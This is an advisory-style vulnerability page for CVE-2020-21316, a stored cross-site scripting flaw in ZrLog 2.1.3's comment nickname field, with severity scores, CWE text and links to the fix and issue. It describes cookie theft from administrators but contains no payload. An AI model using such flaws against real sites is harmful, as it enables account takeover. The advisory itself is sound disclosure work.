Vulnerability Details : CVE-2020-21316
A Cross-site scripting (XSS) vulnerability exists in the comment section in ZrLog 2.1.3, which allows remote attackers to inject arbitrary web script and stolen administrator cookies via the nickname parameter and gain access to the admin panel.
Vulnerability category: Cross site scripting (XSS)
Products affected by CVE-2020-21316
- cpe:2.3:a:zrlog:zrlog:2.1.3:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2020-21316
0.11%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 42 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2020-21316
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
4.3
|
MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
8.6
|
2.9
|
NIST | |
6.1
|
MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
2.8
|
2.7
|
NIST |
CWE ids for CVE-2020-21316
-
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.Assigned by: nvd@nist.gov (Primary)
References for CVE-2020-21316
-
https://github.com/94fzb/zrlog/commit/b921c1ae03b8290f438657803eee05226755c941
Fix #55,#56 xxs inject · 94fzb/zrlog@b921c1a · GitHubPatch;Third Party Advisory
-
https://gist.github.com/T-pod/d9405dbd61243990d65d55c5df0fcbe6
zrlog-xss.md · GitHubPatch;Third Party Advisory
-
https://github.com/94fzb/zrlog/issues/56
前台文章评论处存储型XSS · Issue #56 · 94fzb/zrlog · GitHubPatch;Third Party Advisory
Jump to